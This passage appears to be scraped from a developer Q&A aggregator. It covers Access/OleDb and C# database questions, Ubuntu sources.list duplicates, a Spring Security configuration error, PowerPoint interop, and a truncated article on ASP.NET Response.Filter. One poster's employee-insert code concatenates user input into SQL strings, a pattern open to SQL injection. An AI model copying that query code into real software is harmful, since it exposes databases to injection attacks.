           at Microsoft.VisualStudio.Tools.Office.Runtime.DomainCreator.CreateCustomizationDomainInternal(String solutionLocation, String manifestName, String documentName, Boolean showUIDuringDeployment, IntPtr hostServiceProvider, IntPtr& executor)

        The Zone of the assembly that failed was: MyComputer

    It seems like maybe this is due to trying to load different versions of .NET in the same process/AppDomain; however, the error would indicate it's some sort of permissions issue.

    Read the article

  • Access DB Transaction Insert limit

    - by user986363
    Is there a limit to the number of inserts you can do within an Access transaction before you need to commit, or before Access/Jet throws an error? I'm currently running the following code in hopes of determining that maximum:

        OleDbConnection cn = new OleDbConnection(
            @"Provider=Microsoft.ACE.OLEDB.12.0;Data Source=C:\temp\myAccessFile.accdb;Persist Security Info=False;");
        try
        {
            cn.Open();
            oleCommand = new OleDbCommand("BEGIN TRANSACTION", cn);
            oleCommand.ExecuteNonQuery();
            oleCommand.CommandText = "insert into [table1] (name) values ('1000000000001000000000000010000000000000')";
            for (i = 0; i < 25000000; i++)
            {
                oleCommand.ExecuteNonQuery();
            }
            oleCommand.CommandText = "COMMIT";
            oleCommand.ExecuteNonQuery();
        }
        catch (Exception ex) { }
        finally
        {
            try
            {
                oleCommand.CommandText = "COMMIT";
                oleCommand.ExecuteNonQuery();
            }
            catch { }
            if (cn.State != ConnectionState.Closed)
            {
                cn.Close();
            }
        }

    The error I received in a production application, once I reached 2,333,920 inserts in a single uncommitted transaction, was: "File sharing lock count exceeded. Increase MaxLocksPerFile registry entry". Disabling transactions fixed the problem.
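    A sketch of the usual middle ground, patterned on the loop above: commit and restart the transaction every N inserts so the count of uncommitted row locks stays under Jet's MaxLocksPerFile limit, without giving up transactions entirely. The batch size is illustrative, not a documented threshold:

        const int batchSize = 100000;   // illustrative; tune against MaxLocksPerFile
        string insertSql = "insert into [table1] (name) values ('1000000000001000000000000010000000000000')";
        oleCommand.CommandText = insertSql;
        for (int i = 0; i < 25000000; i++)
        {
            oleCommand.ExecuteNonQuery();
            if ((i + 1) % batchSize == 0)
            {
                oleCommand.CommandText = "COMMIT";
                oleCommand.ExecuteNonQuery();
                oleCommand.CommandText = "BEGIN TRANSACTION";
                oleCommand.ExecuteNonQuery();
                oleCommand.CommandText = insertSql;   // back to inserting
            }
        }
        oleCommand.CommandText = "COMMIT";
        oleCommand.ExecuteNonQuery();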

    Read the article

  • Importing Excel spreadsheet data into existing Access DB

    - by Keeb13r
    I've designed an Access 2003 DB with 3 tables: APPLICATIONS, SERVERS, and INSTALLATIONS. Records in the APPLICATIONS and SERVERS tables are uniquely identified by a synthetic primary key (in Access, an "auto number"). The INSTALLATIONS table is essentially a mapping table between APPLICATIONS and SERVERS: it's a list of records of which applications are installed on which servers. A record in the INSTALLATIONS table is also identified by a synthetic primary key, and it consists of an APPLICATION_ID and SERVER_ID for the records in their respective tables. I have an Excel 2003 spreadsheet I would like to import into this database, but it's proving difficult. The spreadsheet is made up of several tabs/worksheets, each one representing a server with its own listing of installed applications. I'm not sure how to proceed with an import - the "Get External Data -- Import" feature in Access has an "In an Existing Table" option, but it's greyed out. I'm also unsure how to build the relationships between applications and servers when importing records into the INSTALLATIONS table. I had previously fooled around with adding some security to the Access DB file; I think I removed everything, but perhaps I didn't and that's causing the problem? Some sample data from the Excel spreadsheet:

        SERVER101
        * Adobe Reader 9
        * BMC Remedy User 7.0
        * HostExplorer 2008
        * Microsoft Office 2003
        * Microsoft Office 2007
        * Notepad++

        SERVER102
        * Adobe Reader 9
        * DameWare Mini Remote Control
        * Microsoft Office 2003
        * Microsoft .NET Framework 3.5 SP1
        * Oracle 9.2

        SERVER103
        * AWDView
        * EXTRA! Personal Client 32-bit
        * Microsoft Office 2003
        * Microsoft .NET Framework 3.5 SP1
        * Snagit 9.1
        * WinZip 12.1

    The Access DB design is very simple:

        APPLICATION
        * APPLICATION_ID (autonumber)
        * APPLICATION_NAME (varchar)

        SERVER
        * SERVER_ID (autonumber)
        * SERVER_NAME (varchar)

        INSTALLATION
        * INSTALLATION_ID (autonumber)
        * APPLICATION_ID (number)
        * SERVER_ID (number)
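    If the import wizard keeps fighting back, one hedged alternative is to script the import. The C# sketch below (the file path and the assumption that applications sit in column A of each sheet are illustrative) enumerates the worksheets via the Jet provider, treating each sheet name as a server and each row as an installed application, which maps directly onto SERVER, APPLICATION, and INSTALLATION:

        using System;
        using System.Data;
        using System.Data.OleDb;

        class ImportSketch
        {
            static void Main()
            {
                using (var src = new OleDbConnection(
                    @"Provider=Microsoft.Jet.OLEDB.4.0;Data Source=C:\temp\servers.xls;" +
                    "Extended Properties=\"Excel 8.0;HDR=NO\""))
                {
                    src.Open();
                    // Each worksheet shows up as a "table" named like SERVER101$.
                    DataTable sheets = src.GetOleDbSchemaTable(OleDbSchemaGuid.Tables, null);
                    foreach (DataRow sheet in sheets.Rows)
                    {
                        string name = sheet["TABLE_NAME"].ToString();
                        Console.WriteLine("Server: " + name.TrimEnd('$', '\''));
                        using (var cmd = new OleDbCommand("SELECT F1 FROM [" + name + "]", src))
                        using (OleDbDataReader r = cmd.ExecuteReader())
                            while (r.Read())
                                Console.WriteLine("  App: " + r["F1"]);
                        // From here: INSERT the server, find-or-insert each
                        // application by name, then add one INSTALLATION row
                        // per (APPLICATION_ID, SERVER_ID) pair.
                    }
                }
            }
        }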

    Read the article

  • ExecuteNonQuery: Connection property has not been initialized

    - by 20151012
    I get an error in my code; it points at dbcom.ExecuteNonQuery().

    Code (connection):

        public admin_addemp()
        {
            InitializeComponent();
            con = new OleDbConnection(@"Provider=Microsoft.ACE.OLEDB.12.0;Data Source=|DataDirectory|\EMPS.accdb;Persist Security Info=True");
            con.Open();
            ds.Tables.Add(dt);
            ds.Tables.Add(dt2);
        }

    Code (Save button):

        private void save_btn_Click(object sender, EventArgs e)
        {
            OleDbCommand check = new OleDbCommand();
            check.Connection = con;
            check.CommandText = "SELECT COUNT(*) FROM employeeDB WHERE ([EmployeeName]=?)";
            check.Parameters.AddWithValue("@EmployeeName", tb_name.Text);
            if (Convert.ToInt32(check.ExecuteScalar()) == 0)
            {
                dbcom2 = new OleDbCommand("SELECT EmployeeID FROM employeeDB WHERE EmployeeID='" + tb_id.Text + "'", con);
                OleDbParameter param = new OleDbParameter();
                param.ParameterName = tb_id.Text;
                dbcom.Parameters.Add(param);
                OleDbDataReader read = dbcom2.ExecuteReader();
                if (read.HasRows)
                {
                    MessageBox.Show("The Employee ID '" + tb_id.Text + "' already exist. Please choose another Employee ID.");
                    read.Dispose();
                    read.Close();
                }
                else
                {
                    string q = "INSERT INTO employeeDB (EmployeeID, EmployeeName, IC, Address, State, " +
                        " Postcode, DateHired, Phone, ManagerName) VALUES ('" + tb_id.Text + "', " +
                        " '" + tb_name.Text + "', '" + tb_ic.Text + "', '" + tb_add1.Text + "', '" + cb_state.Text + "', " +
                        " '" + tb_postcode.Text + "', '" + dateTimePicker1.Value + "', '" + tb_hp.Text + "', '" + cb_manager.Text + "')";
                    dbcom = new OleDbCommand(q, con);
                    dbcom.ExecuteNonQuery();
                    MessageBox.Show("New Employee '" + tb_name.Text + "'- Successfuly Added.");
                }
            }
            else
            {
                MessageBox.Show("Employee name '" + tb_name.Text + "' already added into the database");
            }
            ds.Dispose();
        }

    I'm using Microsoft Access 2010 as the database, and this is a stand-alone system. Please help me.
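    Two things stand out in the code as posted: dbcom receives a parameter before any command with a connection is assigned to it, and the INSERT is built by concatenating user input. A hedged sketch of the insert with the command created up front against the open connection and OleDb positional parameters (shortened to three fields; the remaining fields follow the same pattern):

        string q = "INSERT INTO employeeDB (EmployeeID, EmployeeName, IC) VALUES (?, ?, ?)";
        using (var cmd = new OleDbCommand(q, con))   // con: the already-open connection
        {
            // OleDb binds by position, so add parameters in the VALUES order.
            cmd.Parameters.AddWithValue("@EmployeeID", tb_id.Text);
            cmd.Parameters.AddWithValue("@EmployeeName", tb_name.Text);
            cmd.Parameters.AddWithValue("@IC", tb_ic.Text);
            cmd.ExecuteNonQuery();
        }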

    Read the article

  • remove duplicate source entry [closed]

    - by yosa
    Possible Duplicate: Duplicate sources.list entry but cannot find the duplicates? This is my source.list and seems fine to me # deb cdrom:[Ubuntu 12.04 LTS _Precise Pangolin_ - Release amd64 (20120425)]/ precise main restricted # deb cdrom:[Ubuntu 12.04 LTS _Precise Pangolin_ - Release amd64 (20120425)]/ dists/precise/restricted/binary-i386/ # deb cdrom:[Ubuntu 12.04 LTS _Precise Pangolin_ - Release amd64 (20120425)]/ dists/precise/main/binary-i386/ # deb cdrom:[Ubuntu 11.10]/ natty main restricted # deb cdrom:[Ubuntu 11.04 _Natty Narwhal_ - Release i386 (20110427.1)]/ natty main restricted # deb cdrom:[Ubuntu 11.10 _Oneiric Ocelot_ - Release amd64 (20111012)]/ dists/oneiric/main/binary-i386/ # deb cdrom:[Ubuntu 11.10 _Oneiric Ocelot_ - Release amd64 (20111012)]/ oneiric main restricted # See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to # newer versions of the distribution. deb http://archive.ubuntu.com/ubuntu precise main restricted ## Major bug fix updates produced after the final release of the ## distribution. ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu ## team. Also, please note that software in universe WILL NOT receive any ## review or updates from the Ubuntu security team. deb http://archive.ubuntu.com/ubuntu precise universe ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu ## team, and may not be under a free licence. Please satisfy yourself as to ## your rights to use the software. Also, please note that software in ## multiverse WILL NOT receive any review or updates from the Ubuntu ## security team. deb http://archive.ubuntu.com/ubuntu precise multiverse ## Uncomment the following two lines to add software from the 'backports' ## repository. ## N.B. software from this repository may not have been tested as ## extensively as that contained in the main release, although it includes ## newer versions of some applications which may provide useful features. ## Also, please note that software in backports WILL NOT receive any review ## or updates from the Ubuntu security team. # deb-src http://ma.archive.ubuntu.com/ubuntu/ natty-backports main restricted universe multiverse ## Uncomment the following two lines to add software from Canonical's ## 'partner' repository. ## This software is not part of Ubuntu, but is offered by Canonical and the ## respective vendors as a service to Ubuntu users. deb http://archive.canonical.com/ubuntu precise partner # deb-src http://archive.canonical.com/ubuntu natty partner ## This software is not part of Ubuntu, but is offered by third-party ## developers who want to ship their latest software. deb http://extras.ubuntu.com/ubuntu precise main deb http://archive.ubuntu.com/ubuntu precise-updates restricted main multiverse universe deb http://security.ubuntu.com/ubuntu/ precise-security restricted main multiverse universe deb http://archive.ubuntu.com/ubuntu precise main universe deb-src http://extras.ubuntu.com/ubuntu precise main # See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to # newer versions of the distribution. deb-src http://archive.ubuntu.com/ubuntu precise main restricted ## Major bug fix updates produced after the final release of the ## distribution. deb http://archive.ubuntu.com/ubuntu precise-updates restricted deb-src http://archive.ubuntu.com/ubuntu precise-updates main restricted ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu ## team. 
Also, please note that software in universe WILL NOT receive any ## review or updates from the Ubuntu security team. deb-src http://archive.ubuntu.com/ubuntu precise universe deb-src http://archive.ubuntu.com/ubuntu precise-updates universe ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu ## team, and may not be under a free licence. Please satisfy yourself as to ## your rights to use the software. Also, please note that software in ## multiverse WILL NOT receive any review or updates from the Ubuntu ## security team. deb-src http://archive.ubuntu.com/ubuntu precise multiverse deb-src http://archive.ubuntu.com/ubuntu precise-updates multiverse ## N.B. software from this repository may not have been tested as ## extensively as that contained in the main release, although it includes ## newer versions of some applications which may provide useful features. ## Also, please note that software in backports WILL NOT receive any review ## or updates from the Ubuntu security team. deb http://archive.ubuntu.com/ubuntu precise-backports main restricted universe multiverse deb-src http://archive.ubuntu.com/ubuntu precise-backports main restricted universe multiverse deb http://archive.ubuntu.com/ubuntu precise-security main restricted deb-src http://archive.ubuntu.com/ubuntu precise-security main restricted deb http://archive.ubuntu.com/ubuntu precise-security universe deb-src http://archive.ubuntu.com/ubuntu precise-security universe deb http://archive.ubuntu.com/ubuntu precise-security multiverse deb-src http://archive.ubuntu.com/ubuntu precise-security multiverse ## Uncomment the following two lines to add software from Canonical's ## 'partner' repository. ## This software is not part of Ubuntu, but is offered by Canonical and the ## respective vendors as a service to Ubuntu users. # deb http://archive.canonical.com/ubuntu oneiric partner # deb-src http://archive.canonical.com/ubuntu oneiric partner ## This software is not part of Ubuntu, but is offered by third-party ## developers who want to ship their latest software. # See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to # newer versions of the distribution. ## Major bug fix updates produced after the final release of the ## distribution. ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu ## team. Also, please note that software in universe WILL NOT receive any ## review or updates from the Ubuntu security team. ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu ## team, and may not be under a free licence. Please satisfy yourself as to ## your rights to use the software. Also, please note that software in ## multiverse WILL NOT receive any review or updates from the Ubuntu ## security team. ## N.B. software from this repository may not have been tested as ## extensively as that contained in the main release, although it includes ## newer versions of some applications which may provide useful features. ## Also, please note that software in backports WILL NOT receive any review ## or updates from the Ubuntu security team. ## Uncomment the following two lines to add software from Canonical's ## 'partner' repository. ## This software is not part of Ubuntu, but is offered by Canonical and the ## respective vendors as a service to Ubuntu users. 
# deb http://archive.canonical.com/ubuntu precise partner # deb-src http://archive.canonical.com/ubuntu precise partner ## This software is not part of Ubuntu, but is offered by third-party ## developers who want to ship their latest software. # deb http://packages.dotdeb.org stable all # deb-src http://packages.dotdeb.org stable all # deb http://ppa.launchpad.net/bean123ch/burg/ubuntu lucid main # deb-src http://ppa.launchpad.net/bean123ch/burg/ubuntu lucid main this is the error given by apt-get update which stops at 64% reading W: Duplicate sources.list entry http://archive.ubuntu.com/ubuntu/ precise/main amd64 Packages (/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_main_binary-amd64_Packages) W: Duplicate sources.list entry http://archive.ubuntu.com/ubuntu/ precise/universe amd64 Packages (/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_universe_binary-amd64_Packages) W: Duplicate sources.list entry http://archive.ubuntu.com/ubuntu/ precise/main i386 Packages (/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_main_binary-i386_Packages) W: Duplicate sources.list entry http://archive.ubuntu.com/ubuntu/ precise/universe i386 Packages (/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_universe_binary-i386_Packages) W: Duplicate sources.list entry http://archive.ubuntu.com/ubuntu/ precise-updates/restricted amd64 Packages (/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise-updates_restricted_binary-amd64_Packages) W: Duplicate sources.list entry http://archive.ubuntu.com/ubuntu/ precise-updates/restricted i386 Packages (/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise-updates_restricted_binary-i386_Packages)

    Read the article

  • Best practice to query data from MS SQL Server in C Sharp?

    - by Bruno
    What is the best way to query data from an MS SQL Server in C#? I know that it is not good practice to have an SQL query in the code. Is the best way to create a stored procedure and call it from C# with parameters?

        using (var conn = new SqlConnection(connStr))
        using (var command = new SqlCommand("StoredProc", conn)
                             { CommandType = CommandType.StoredProcedure })
        {
            conn.Open();
            command.ExecuteNonQuery();
            conn.Close();
        }
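    For a query that returns rows (rather than the ExecuteNonQuery call above), the common pattern adds parameters and reads with SqlDataReader. A sketch; the procedure and column names are invented for illustration:

        using System;
        using System.Data;
        using System.Data.SqlClient;

        static void PrintOrders(string connStr, int customerId)
        {
            using (var conn = new SqlConnection(connStr))
            using (var cmd = new SqlCommand("GetOrdersForCustomer", conn)
                             { CommandType = CommandType.StoredProcedure })
            {
                cmd.Parameters.AddWithValue("@CustomerId", customerId);
                conn.Open();
                using (SqlDataReader reader = cmd.ExecuteReader())
                {
                    while (reader.Read())
                        Console.WriteLine(reader["OrderDate"]);
                }
                // conn is closed by the using block; no explicit Close needed.
            }
        }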

    Read the article

  • No bean named 'springSecurityFilterChain' is defined

    - by michaeljackson4ever
    When configs are loaded, I get the error SEVERE: Exception starting filter springSecurityFilterChain org.springframework.beans.factory.NoSuchBeanDefinitionException: No bean named 'springSecurityFilterChain' is defined My sec-config: <http use-expressions="true" access-denied-page="/error/casfailed.html" entry-point-ref="headerAuthenticationEntryPoint"> <intercept-url pattern="/" access="permitAll"/> <!-- <intercept-url pattern="/index.html" access="permitAll"/> --> <intercept-url pattern="/index.html" access="hasAnyRole('ROLE_USER')"/> <intercept-url pattern="/history.html" access="hasAnyRole('ROLE_USER')"/> <intercept-url pattern="/absence.html" access="hasAnyRole('ROLE_USER')"/> <intercept-url pattern="/search.html" access="hasAnyRole('ROLE_USER')"/> <intercept-url pattern="/employees.html" access="hasAnyRole('ROLE_USER')"/> <intercept-url pattern="/employee.html" access="hasAnyRole('ROLE_USER')"/> <intercept-url pattern="/contract.html" access="hasAnyRole('ROLE_USER')"/> <intercept-url pattern="/myforms.html" access="hasAnyRole('HLO','OPISK')"/> <intercept-url pattern="/vacationmsg.html" access="hasAnyRole('ROLE_USER')"/> <intercept-url pattern="/redirect.jsp" filters="none" /> <intercept-url pattern="/error/**" filters="none" /> <intercept-url pattern="/layout/**" filters="none" /> <intercept-url pattern="/js/**" filters="none" /> <intercept-url pattern="/**" access="isAuthenticated()" /> <!-- session-management invalid-session-url="/absence.html"/ --> <!-- logout logout-success-url="/logout.html"/ --> <custom-filter ref="ssoHeaderAuthenticationFilter" before="CAS_FILTER"/> <!-- CAS_FILTER ??? --> </http> <authentication-manager alias="authenticationManager"> <authentication-provider ref="doNothingAuthenticationProvider"/> </authentication-manager> <beans:bean id="doNothingAuthenticationProvider" class="com.nixu.security.sso.web.DoNothingAuthenticationProvider"/> <beans:bean id="ssoHeaderAuthenticationFilter" class="com.nixu.security.sso.web.HeaderAuthenticationFilter"> <beans:property name="groups"> <beans:map> <beans:entry key="cn=lake,ou=confluence,dc=utu,dc=fi" value="ROLE_ADMIN"/> </beans:map> </beans:property> </beans:bean> <beans:bean id="headerAuthenticationEntryPoint" class="com.nixu.security.sso.web.HeaderAuthenticationEntryPoint"/> And web.xml <context-param> <param-name>contextConfigLocation</param-name> <param-value> /WEB-INF/applicationContext.xml /WEB-INF/sec-config.xml /WEB-INF/idm-config.xml /WEB-INF/ldap-config.xml </param-value> </context-param> <display-name>KeyCard</display-name> <context-param> <param-name>webAppRootKey</param-name> <param-value>KeyCardAppRoot</param-value> </context-param> <context-param> <param-name>log4jConfigLocation</param-name> <param-value>/WEB-INF/log4j.properties</param-value> </context-param> <!-- Reads request input using UTF-8 encoding --> <filter> <filter-name>characterEncodingFilter</filter-name> <filter-class>org.springframework.web.filter.CharacterEncodingFilter</filter-class> <init-param> <param-name>encoding</param-name> <param-value>UTF-8</param-value> </init-param> <init-param> <param-name>forceEncoding</param-name> <param-value>true</param-value> </init-param> </filter> <filter> <filter-name>springSecurityFilterChain</filter-name> <filter-class>org.springframework.web.filter.DelegatingFilterProxy</filter-class> </filter> <filter-mapping> <filter-name>characterEncodingFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>springSecurityFilterChain</filter-name> 
<url-pattern>/*</url-pattern> </filter-mapping> <listener> <listener-class>org.springframework.web.context.ContextLoaderListener</listener-class> </listener> <listener> <listener-class>org.springframework.web.util.Log4jConfigListener</listener-class> </listener> <listener> <!-- this is for session scoped objects --> <listener-class>org.springframework.web.context.request.RequestContextListener</listener-class> </listener> <listener> <listener-class>org.springframework.security.web.session.HttpSessionEventPublisher</listener-class> </listener> <!-- Handles all requests into the application --> <servlet> <servlet-name>KeyCard</servlet-name> <servlet-class>org.springframework.web.servlet.DispatcherServlet</servlet-class> <load-on-startup>1</load-on-startup> </servlet> <servlet> <servlet-name>tiles</servlet-name> <servlet-class>org.apache.tiles.web.startup.TilesServlet</servlet-class> <init-param> <param-name> org.apache.tiles.impl.BasicTilesContainer.DEFINITIONS_CONFIG </param-name> <param-value> /WEB-INF/tilesViewContext.xml </param-value> </init-param> <load-on-startup>2</load-on-startup> </servlet> <servlet-mapping> <servlet-name>KeyCard</servlet-name> <url-pattern>*.html</url-pattern> </servlet-mapping> <session-config> <session-timeout> 120 </session-timeout> </session-config> <welcome-file-list> <welcome-file>index.jsp</welcome-file> </welcome-file-list> <!-- error-page> <exception-type>java.lang.Exception</exception-type> <location>/WEB-INF/error/error.jsp</location> </error-page --> </web-app> What's wrong?

    Read the article

  • Bullet indents in PowerPoint 2007 compatibility mode via .NET interop issue

    - by L. Shaydariv
    Hello. I've got a really difficult bug and I can't see the fix; the subject has been driving me insane for a long time. Consider the following scenario:

    1) There is a PowerPoint 2003 presentation. It contains a single slide with a single shape, and the shape contains a text frame including a bulleted list with an arbitrary structure.

    2) There is a requirement to get the bullet indents for every bulleted paragraph using PowerPoint 2007.

    I can satisfy the requirement by opening the presentation in compatibility mode and applying the following VBA script:

        With ActivePresentation
            Dim sl As Slide: Set sl = .Slides(1)
            Dim sh As Shape: Set sh = sl.Shapes(1)
            Dim i As Integer
            For i = 1 To sh.TextFrame.TextRange.Paragraphs.Count
                Dim para As TextRange: Set para = sh.TextFrame.TextRange.Paragraphs(i, 1)
                Debug.Print para.Text; para.indentLevel, sh.TextFrame.Ruler.Levels(para.indentLevel).FirstMargin
            Next i
        End With

    which produces the following output:

        A 1 0
        B 1 0
        C 2 24
        D 3 60
        E 5 132

    Obviously everything is perfect: it shows the proper list item text, list item level, and bullet indent. But I can't see how to reach the same result using C#. Let's add a COM reference to Microsoft.Office.Interop.PowerPoint 2.9.0.0 (taken from MSPPT.OLB, MS Office 12):

        // presentation = ...("presentation.ppt")... a PowerPoint 2003 presentation
        Slide slide = presentation.Slides[1];
        Shape shape = slide.Shapes[1];
        for (int i = 1; i <= shape.TextFrame.TextRange.Paragraphs(-1, -1).Count; i++)
        {
            TextRange paragraph = shape.TextFrame.TextRange.Paragraphs(i, 1);
            Console.WriteLine("{0} {1} {2}",
                paragraph.Text,
                paragraph.IndentLevel,
                shape.TextFrame.Ruler.Levels[paragraph.IndentLevel].FirstMargin);
        }

    Oh, man... What is this? I've got problems here. First, the paragraph.Text value is trimmed at the first '\r' character (however, paragraph.Text[0] really does return the first character, O_o). But that's ok, I can shut my eyes to this. Second, I can't understand why the first margins are always zero, no matter which level they belong to. They are always zero in compatibility mode... It's hard to believe. :) So is there any way to fix this, or at least a workaround? I'd accept any help regarding the subject; I can't even find any article related to the issue. :( Perhaps you have been face to face with it yourself... Or is it just a bug with no fix that must be reported to Microsoft? Thank you.

    Read the article

  • Populating data in multiple cascading dropdown boxes in Access 2007

    - by miCRoSCoPiC_eaRthLinG
    Hello all, I've been assigned the task of designing a temporary customer tracking system in MS Access 2007 (sheeeesh!). The tables and relationships have all been set up successfully, but I'm running into a minor problem while designing the data entry form for one table... Here's a bit of explanation first. The screen contains 3 dropdown boxes (apart from other fields).

    1st dropdown: The first dropdown (cboMarket) represents the Market and lets users select between 2 options, Domestic and International. Since it contains only 2 items, I didn't bother making a table for it; I added them as pre-defined list items.

    2nd dropdown: Once the user makes a selection in the first one, the second dropdown (cboLeadCategory) loads a list of Lead Categories, namely Fairs & Exhibitions, Agents, Press Ads, Online Ads, etc. Different sets of lead categories are used for the 2 markets, hence this box is dependent on the first one. The structure of the bound table, named Lead_Categories, is:

        ID Autonumber
        Lead_Type TEXT <- actually a list that takes up Domestic or International
        Lead_Category_Name TEXT

    3rd dropdown: Based on the choice of category in the 2nd one, the third dropdown (cboLeadSource) is supposed to display a pre-defined set of lead sources belonging to that category. The table, named Lead_Sources, has this structure:

        ID Autonumber
        Lead_Category NUMBER <- related to ID of the Lead_Categories table
        Lead_Source TEXT

    When I make a selection in the 1st dropdown, its AfterUpdate event is called, which instructs the 2nd dropdown to load its contents:

        Private Sub cboMarket_AfterUpdate()
            Me![cboLead_Category].Requery
        End Sub

    The Row Source of the 2nd combo contains this query:

        SELECT Lead_Categories.ID, Lead_Categories.Lead_Category_Name
        FROM Lead_Categories
        WHERE Lead_Categories.Lead_Type=[cboMarket]
        ORDER BY Lead_Categories.Lead_Category_Name;

    The AfterUpdate event of the 2nd combo is:

        Private Sub cboLeadCategory_AfterUpdate()
            Me![cboLeadSource].Requery
        End Sub

    The Row Source of the 3rd combo contains:

        SELECT Leads_Sources.ID, Leads_Sources.Lead_Source
        FROM Leads_Sources
        WHERE [Lead_Sources].[Lead_Category]=[Lead_Categories].[ID]
        ORDER BY Leads_Sources.Lead_Source;

    Problem: When I make a selection in cboMarket, the 2nd combo cboLeadCategory loads the appropriate categories without a hitch. But when I select a particular category in it, instead of the 3rd combo loading the lead source names, a modal dialog is displayed asking me to Enter a Parameter, and when I enter anything into this prompt (valid or invalid data), I get yet another prompt. Why is this happening? Why isn't the 3rd box loading the source names as desired? Can anyone please shed some light on where I am going wrong? Thanks, m^e

    Read the article

  • Capturing and Transforming ASP.NET Output with Response.Filter

    - by Rick Strahl
During one of my Handlers and Modules sessions at DevConnections this week one of the attendees asked a question that I didn't have an immediate answer for. Basically he wanted to capture response output completely and then apply some filtering to the output – effectively injecting some additional content into the page AFTER the page had completely rendered. Specifically, the output should be captured from anywhere – not just a Page – and have the additional content injected into it. Some time ago I posted some code that allows you to capture ASP.NET Page output by overriding the Render() method, capturing the HtmlTextWriter() and reading its content, modifying the rendered data as text and then writing it back out. I've actually used this approach on a few occasions and it works fine for ASP.NET pages. But this obviously won't work outside of the Page class environment and it's not really generic – you have to create a custom page class in order to handle the output capture. [updated 11/16/2009 – updated ResponseFilterStream implementation and a few additional notes based on comments] Enter Response.Filter However, ASP.NET includes a Response.Filter which can be used – well, to filter output. Basically Response.Filter is a stream through which the OutputStream is piped back to the Web Server (indirectly). As content is written into the Response object, the filter stream receives the appropriate Stream commands like Write, Flush and Close, as well as read operations, although those are uncommon for a Response.Filter. The Response.Filter can be programmatically replaced at runtime, which allows you to effectively intercept all output generation that runs through ASP.NET. A common Example: Dynamic GZip Encoding A rather common use of Response.Filter is hooking up code-based, dynamic GZip compression for requests, which is dead simple: apply a GZipStream (or DeflateStream) to Response.Filter. The following generic routines can be used very easily to detect the GZip capability of the client and compress response output with a single line of code and a couple of library helper routines: WebUtils.GZipEncodePage(); which is handled with a few lines of reusable code and a couple of static helper methods: /// <summary> /// Sets up the current page or handler to use GZip through a Response.Filter. /// IMPORTANT: You have to call this method before any output is generated!
/// </summary> public static void GZipEncodePage() { HttpResponse Response = HttpContext.Current.Response; if (IsGZipSupported()) { string AcceptEncoding = HttpContext.Current.Request.Headers["Accept-Encoding"]; if (AcceptEncoding.Contains("deflate")) { Response.Filter = new System.IO.Compression.DeflateStream(Response.Filter, System.IO.Compression.CompressionMode.Compress); Response.AppendHeader("Content-Encoding", "deflate"); } else { Response.Filter = new System.IO.Compression.GZipStream(Response.Filter, System.IO.Compression.CompressionMode.Compress); Response.AppendHeader("Content-Encoding", "gzip"); } } // Allow proxy servers to cache encoded and unencoded versions separately Response.AppendHeader("Vary", "Accept-Encoding"); } /// <summary> /// Determines if GZip is supported /// </summary> /// <returns></returns> public static bool IsGZipSupported() { string AcceptEncoding = HttpContext.Current.Request.Headers["Accept-Encoding"]; if (!string.IsNullOrEmpty(AcceptEncoding) && (AcceptEncoding.Contains("gzip") || AcceptEncoding.Contains("deflate"))) return true; return false; } GZipStream and DeflateStream are streams that are assigned to Response.Filter and by doing so apply the appropriate compression on the active Response. Response.Filter content is chunked So to implement a Response.Filter effectively requires only that you implement a custom stream and handle the Write() method to capture Response output as it's written. At first blush this seems very simple – you capture the output in Write(), transform it and write out the transformed content in one pass. And that indeed works for small amounts of content. But you see, the problem is that output is written in small buffer chunks (a little less than 16k it appears) rather than in a single Write() statement into the stream, which makes perfect sense: ASP.NET streams data back to IIS in smaller chunks to minimize memory usage en route. Unfortunately this also makes it more difficult to implement any filtering routines, since you don't directly get access to all of the response content, which is problematic especially if those filtering routines require you to look at the ENTIRE response in order to transform or capture the output, as is needed for the solution the gentleman in my session asked for. So in order to address this a slightly different approach is required, one that basically captures all the Write() buffers passed into a cached stream and then makes the stream available only when it's complete and ready to be flushed. As I was thinking about the implementation I also started thinking about the few instances when I've used Response.Filter implementations. Each time I had to create a new Stream subclass and write my custom functionality, but in the end each implementation did the same thing – capturing output and transforming it. I thought there should be an easier way to do this by creating a re-usable Stream class that can handle stream transformations that are common to Response.Filter implementations. Creating a semi-generic Response Filter Stream Class What I ended up with is a ResponseFilterStream class that provides a handful of Events that allow you to capture and/or transform Response content.
The class implements a subclass of Stream and then overrides Write() and Flush() to handle capturing and transformation operations. By exposing events it's easy to hook up capture or transformation operations via single focused methods. ResponseFilterStream exposes the following events: CaptureStream, CaptureString Capture the output only and provide either a MemoryStream or String with the final page output. Capture is hooked to the Flush() operation of the stream. TransformStream, TransformString Allow you to transform the complete response output with events that receive a MemoryStream or String respectively; you can modify the output and return it back as the return value. The transformed output is then written back out in a single chunk to the response output stream. These events capture all output internally first, then write the entire buffer into the response. TransformWrite, TransformWriteString Allow you to transform the Response data as it is written, in its original chunk size, in the Stream's Write() method. Unlike TransformStream/TransformString which operate on the complete output, these events only see the current chunk of data written. This is more efficient as there's no caching involved, but can cause problems if the content you search for splits across chunk boundaries. Using this implementation, creating a custom Response.Filter transformation becomes as simple as the following code. To hook up the Response.Filter using the MemoryStream version event: ResponseFilterStream filter = new ResponseFilterStream(Response.Filter); filter.TransformStream += filter_TransformStream; Response.Filter = filter; and the event handler to do the transformation: MemoryStream filter_TransformStream(MemoryStream ms) { Encoding encoding = HttpContext.Current.Response.ContentEncoding; string output = encoding.GetString(ms.ToArray()); output = FixPaths(output); ms = new MemoryStream(output.Length); byte[] buffer = encoding.GetBytes(output); ms.Write(buffer,0,buffer.Length); return ms; } private string FixPaths(string output) { string path = HttpContext.Current.Request.ApplicationPath; // override root path wonkiness if (path == "/") path = ""; output = output.Replace("\"~/", "\"" + path 